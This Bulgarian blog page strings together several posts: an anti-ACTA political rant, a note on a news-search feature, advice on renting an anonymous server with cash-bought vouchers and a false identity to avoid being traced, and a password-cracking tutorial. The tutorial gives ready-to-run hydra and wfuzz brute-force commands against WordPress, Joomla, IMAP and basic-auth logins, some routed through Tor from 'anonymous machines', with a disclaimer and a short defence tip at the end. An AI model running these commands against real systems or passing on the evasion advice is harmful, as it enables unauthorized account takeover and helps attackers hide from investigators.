чудя се защо?!

Най-накрая се наканих и направих нещо ново за сайтчето, което отварям всеки ден по няколко пъти. Въпреки навлизането на социалните мрежи, Грамофон си остана моят портал в интернет. Отварям го още от сутринта, с кафето, и не спирам да го проверявам цял ден. От там научавам новинките, от там следя постовете на българските блогъри, от там се ориентирам с какво да се облека, а напоследък от там правя и изследвания на архив новини. Последното стана възможно след като инсталирах и конфигурирах Сфинкс сърч. Така успях да направя доста бързо търсене в до сега агрегираните новини и статии - около 1,300,000 (и растат всеки ден..). Чрез търсенето попадам на много интересни статии, които по някаква причина съм пропуснал.

ГЕРБ, БСП, НДСВ, СДС, ДСБ, Бойко Борисов, Сергей Станишев, Уорлик, Русия, Америка, Иран

Споразумението #ACTA, което Америка иска да прокара в Европа е прясно доказателство, че не трябва да се вярва и партнира сляпо на нито една "Велика" сила. Дори тя да е заела позиция на Световна полиция. Преди поемахме от изток, сега поемаме от запад. Чак сега разбирам какво са имали предвид анонимните творци, когато нарисуваха паметника в София и написаха "В крак с времето". Преди сме строели малумни паметници сляпо вярващи на "братят-освободитлели". Днес, в крак с времето, пак се заробваме - този път чрез "търговски споразумения" от Запад. Дано не се окаже, че Западът обича цензурата, досиетата и донасянето повече от Изтока.

Защо си мисля, че американците нарочно ни показаха интернет, накараха ни да станем зависими от него, а сега искат да ни го дръпнат...? Зависимости! И преди са действали, като гледам действат и сега. И въпреки че Бого е започнал борбата преди 2-3 години, аз и доста мои познати чак сега разбират какъв автогол си вкарваме, ако оставим да мине споразумението #ACTA. Защо хората не се интересуват навременно от правата си, а се бунтуват чак като им ги вземат. Не е никак футуристично, ако кажем че скоро може да живеем като герои от роман на Оруел...

Оптимистичното е че, ако до преди 3 дена нямаше нито една медия, която да е писала по темата, от три дена насам все пак започна да се пише за това. Е, някои политици се метнаха на вълната на недоволството, но да се надяваме, че ще ги запомним до другите избори. А там ще ги накажем поименно.

Препоръчвам това видео на всеки, който има проблеми с самочувствието си на българин.

Ако властите или конкуренцията Ви дишат във врата, или поне си мислите че го правят, можете да прибегнете до закупуването на анонимен сървър, някъде из интернет, през който да прекарате трафика си (VPN). Така ще ги забавите малко, докато разберат какво се случва. Практически VPN се явява една дълбоко заустена тръба в интернет, от която излиза Вашия трафик. Нещо като тази. Шегата на страна! Ако публикувате в интернет през истинското си IP чувствителна информация е въпрос на време да се разбере истинската Ви самоличност. Ако имате така нареченото статично IP, което си е само за Вас - това е елементарна задача. За да скриете самоличността можете да си сетъпнете VPN сървър някъде из света, който да се явява Вашата трибуна към интернет. Трафикът между него и Вас е криптиран, т.е. нещо като метална тръба до него. Ако в момента трафикът Ви е излизал от Варна, България, а след това трафика Ви ще излиза от Франция, за пример. Също като тръбата на Златни пясъци :)

Но ако платите за сървъра си с кредитната карта, дали въобще има смисъл да го сетъпвате? Вие вече сте осведомили, който трябва, че вирутално се премествате във Франция. И пак могат да Ви идентифицират.

Затова Ви препоръчвам да си купите анонимно сървър от Mr. Zhang,  но в никакъв случай да не плащате чрез кредитна карта. Най-добрият начин е плащане в кеш, но трудно ще стигнете до Китай, за да му платите на този човек. Затова в белите страни са измислени така наречените предплатени кредитни карти. В България няма да намерите такива. Но във Франция, Испания, Португалия има. Сигурен съм че имате приятел там. Изпратете му пари и му заръчайте да ви купи ваучър Ukash. Инструктирайте го да плати в КЕШ, а след това да Ви изпрати номерата на ваучъра. С него отивате при Mr. Zhang и си избирате машина. Може би не е нужно да Ви напомням, че е хубаво да се представите на Mr. Zhang като измислено лице, макар трудно да стигне Интерпол до него в Китай. Но Вие се подсигурете.

Същото важи и за покупка на анонимен домейн. До сега обаче нямам практика да съм купувал и бих приел Вашите съвети от къде е най-сигурно да се пазарува!

Дори и най-перфектно и сигурно написаният сайт може да бъде компрометиран от глупостта на задклавиатурното устройство. Колкото и да сте си играли да осигурявате някой администраторски панел, в случай че сте дали парола на секретарката Незабравка, то Вие сте оставили дупка в сигурността на апликацията. Обикновено тези съсловия, но не само те, избират лесни и кратки паролки. Дали ще е рожденна дата, дали ще е кратко име с цифри 123 накрая, а може би елементарното 123456, то Вашият админ панел е отворен към света. Точно както няма ключалка направена от човек, която да не може да се разбие от човек, така е и с паролите. Но при разбиването на пароли по-големи от 10 символа вече си говорим за много ресурси и време. Парола от 6 цифри е елементарна за разбиване, а 6 до 8 букви и цифри - е реалистично. Затова избирайте сериозни и трудни пароли. И карайте потребителите си да го правят, иначе е било безсмислено да пишете качествен и сигурен код.

Една от стъпките при одит на сигурност на уеб сайт е проверката за слаби пароли. Много от уеб апликациите нямат защита срещу ботове (каптча или забрана след n на брой опити), което улеснява нашата задача при изпробване на речници с пароли. Всичко е автомагично, нали не мислите че ще го правим на ръка?

Инструментите, които Ви трябват, за разбиване на уеб апликации са crunch и wfuzz или hydra. Също така Ви трябва и анонимна машина (една или повече) от която да правите пробите. С crunch можете да генерирате речници с пароли. За него има страхотно ръководство тук. Wfuzz и Hydra имат интересни способности, документацията им е доста дискриптивна, но няма твърде много публикувани примери. Затова аз пускам моите записки тук, за да ги ползвате като начало на Вашето изследване. Не смятам да описвам документацията на тези програмки, а само да Ви дам примери за ползването им. Тези инструменти можете да ги намерите готови за използване в тази дистрибуция.

Как да влезем взлом (bruteforce) в Wordpress

hydra -l admin -P  /path/to/wordlist -s 80 wordpress_url_here http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=1:ERROR"

python wfuzz.py -t 1 -s 10 -c -z file -f  /path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&submit=1" http://wordpress_url_here/wp-login.php -V

Как да влезем взлом (bruteforce) в Joomla

python wfuzz.py -t 1 -s 10 -c -z file -f  /path/to/wordlist -d "usrname=admin&pass=FUZZ&submit=1" http://joomla_url_here/administrator/

Как да влзем взлом (bruteforce) в IMAP сървър

hydra -l user@emaila.com -P /path/to/wordlist server_host_here imap

Как да разбием basic auth (.htaccess & .htpasswd)

hydra -l admin -P wordlist/mywordlist/mixalpha-numeric-all-space_6 192.168.0.1 http-head /

(полезно при разбиване на модеми, рутери, аксес пойнтове)

В повечето случаи когато разбивате уеб апликация ще получавате код 200 при грешна парола, и 301 при успешна двойка. Така ще се ориентирате, коя парола е съвпаднала. Във всеки случай, трябва да знаете как работи системата за аутентикация преди да започнете да я разбивате.

Как да ползваме wfuzz през Tor

Изключително бавно е! Но все пак трябва да го отбележа като възможен сценарии.

python wfuzz.py -x SOCKS5 -p localhost:8118 -t 1 -s 10 -c -z file,/path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&wp-submit=1" http://host/wordpress/wp-login.php

python wfuzz.py -x SOCKS5 -p localhost:8118 -t 15 -s 3 -c -z file,/path/to/wordlist --hc 404 --hc 200 -d "log=admin&pwd=FUZZ&wp-submit=1" -o html http://host/wp-login.php 2> file_to_print.html

!! АВТОРЪТ НЕ НОСИ НИКАКВА ОТГОВОРНОСТ ЗА ДЕЙСТВИЯТА НА ТРЕТИ ЛИЦА! Информацията тук е предоставена единствено за образователни и защитни цели! Хората трябва да знаят колко е лесно, за да се пазят по-добре! По-добре ще е да я ползвате за одит, а не за разбиване на паролата на рутера на съседа, нали? НЕ НОСЯ ОТГОВОРНОСТ!

Може би ще е добре да кажа и как се защитава Wordpress от взлом: С някой плугин от този тип. А imap, web, ssh и други демони могат да се защитят с Fail2Ban.